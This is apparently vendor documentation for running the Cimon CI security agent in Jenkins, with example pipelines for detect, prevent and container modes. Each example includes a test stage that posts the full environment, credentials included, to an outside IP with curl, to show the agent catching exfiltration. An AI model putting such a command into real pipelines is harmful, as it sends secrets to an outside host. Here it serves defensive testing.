Jenkins
Jenkins does not offer out-of-the-box hosted runners like GitHub Actions and Azure Pipelines, but provides great flexibility to use self-hosted runners of varying execution types.
Jenkins Self-Hosted Runners Support
In Jenkins, there are two types of execution. Creating virtual or physical nodes that will execute jobs, or setting up a cloud (e.g., Docker-based, K8s-based, etc.) that will provision the job.
Both cases require the underlying operating system to support the minimal requirements for running eBPF code and loading it. You can find more information in the self-hosted support and troubleshooting section.
Cimon execution should be strictly adapted to Jenkins' runner mode, and the limitations should be understood.
- Agent Runner - Currently, when running build natively on the agent (no containers, etc.), we can only run a single instance of Cimon simultaneously. This is due to the fact that a network adapter can only be attached to a single program.
- Docker-based Runner - The Docker-based runner is not yet supported.
- Kubernetes-based Runner - Cimon can be run in Kubernetes-based runner environments (which are highly popular among enterprises)through the DaemonSet operation of Cimon.
Cimon Jenkins Pipeline
Jenkins supports running Cimon on all major pipeline types - "Freestyle project", "Pipeline", and "Multibranch Pipeline".
Running Cimon Natively
Here is a Jenkinsfile that creates a build and runs Cimon natively on the Jenkins agent:
- Detect Mode
- Prevent Mode
pipeline {
agent any
environment {
CIMON_CLIENT_ID = credentials("cimon-client-id")
CIMON_SECRET = credentials("cimon-secret")
}
options {
disableConcurrentBuilds()
}
stages {
stage('Install Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
}
}
stage('Run Cimon') {
steps {
sh 'sudo -E cimon agent start-background'
}
}
stage('Test') {
steps {
sh 'git clone https://github.com/octocat/Hello-World Hello-World'
}
}
stage('Allowed network traffic') {
steps {
sh 'curl -sm 1 https://34.121.34.97 || true'
}
}
stage('Allowed network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://cycode.com || true'
sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
}
}
stage('Forbidden network traffic (IP)') {
steps {
sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
}
}
stage('Forbidden network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://yahoo.com || true'
}
}
}
post {
always {
sh 'sudo -E cimon agent stop'
}
}
}
Explanation:
environment {
CIMON_CLIENT_ID = credentials("cimon-client-id")
CIMON_SECRET = credentials("cimon-secret")
}
Cimon receives input parameters through environment variables. Security policies will be configured by these variables.
options {
disableConcurrentBuilds()
}
To enforce Cimon installation step running first, this configuration option must be enabled.
stage('Install Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
}
}
Installing Cimon agent on the runner. This step doesn't runs the agent yet. More info for installation options can be found in CLI integration page.
stage('Run Cimon') {
steps {
sh 'sudo -E cimon agent start-background'
}
}
Running Cimon agent in background. Once this step is over successfully, Cimon is tracing all activility according to configuration given.
post {
always {
sh 'sudo -E cimon agent stop'
}
}
Cimon agent is stopped, and the report is printed.
pipeline {
agent any
environment {
CIMON_PREVENT = "1"
CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
cycode.com
"""
CIMON_ALLOWED_IPS = """
34.121.34.97
"""
}
options {
disableConcurrentBuilds()
}
stages {
stage('Install Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
}
}
stage('Run Cimon') {
steps {
sh 'sudo -E cimon agent start-background'
}
}
stage('Test') {
steps {
sh 'git clone https://github.com/octocat/Hello-World Hello-World'
}
}
stage('Allowed network traffic') {
steps {
sh 'curl -sm 1 https://34.121.34.97 || true'
}
}
stage('Allowed network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://cycode.com || true'
sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
}
}
stage('Forbidden network traffic (IP)') {
steps {
sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
}
}
stage('Forbidden network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://yahoo.com || true'
}
}
}
post {
always {
sh 'sudo -E cimon agent stop'
}
}
}
Explanation:
environment {
CIMON_PREVENT = "1"
CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
cycode.com
"""
CIMON_ALLOWED_IPS = """
34.121.34.97
"""
}
Cimon receives input parameters through environment variables. Security policies will be configured by these variables.
options {
disableConcurrentBuilds()
}
To enforce Cimon installation step running first, this configuration option must be enabled.
stage('Install Cimon') {
steps {
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
}
}
Installing Cimon agent on the runner. This step doesn't runs the agent yet. More info for installation options can be found in CLI integration page.
stage('Run Cimon') {
steps {
sh 'sudo -E cimon agent start-background'
}
}
Running Cimon agent in background. Once this step is over successfully, Cimon is tracing all activility according to configuration given.
post {
always {
sh 'sudo -E cimon agent stop'
}
}
Cimon agent is stopped, and the report is printed.
Running Cimon in a Container
The Jenkins builds generally use a new container for every build, which helps clean up the environment and ensure that one build doesn't interfere with another one. Additionally, Cimon could interfere with one another due to running on the same kernel if several Jenkins executors are run on the same agent without sufficient isolation.
Therefore, when running Cimon inside a container, Cimon can isolate the execution context to only the specified container, allowing Jenkins to run multiple builds with prevention policies simultaneously.
In this example, Cimon is running inside a container:
pipeline {
agent {
docker {
image 'ubuntu:22.04'
args '--user="root" --privileged'
}
}
environment {
CIMON_PREVENT = "1"
CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
cycode.com
"""
CIMON_ALLOWED_IPS = """
34.121.34.97
"""
}
options {
disableConcurrentBuilds()
}
stages {
stage('Install Cimon') {
steps {
sh 'apt update && apt install curl wget -y'
sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sh -s -- -b /usr/local/bin'
}
}
stage('Run Cimon') {
steps {
sh 'cimon agent start-background'
}
}
stage('Allowed network traffic') {
steps {
sh 'curl -sm 1 https://34.121.34.97 || true'
}
}
stage('Allowed network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://cycode.com || true'
sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
}
}
stage('Forbidden network traffic (IP)') {
steps {
sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
}
}
stage('Forbidden network traffic (hostname)') {
steps {
sh 'wget --quiet --timeout 1 https://yahoo.com || true'
}
}
}
post {
always {
sh 'cimon agent stop'
}
}
}
The printed Cimon report (and policies that follow) pertain to the container's processes and network connections. Therefore, the host environment will be unaffected, allowing only control of the build process inside the container.
Usage
The supported parameters that could be supplied to Cimon are explained in the CLI integration.
Report
The final report is printed in the build logs of each job by Cimon.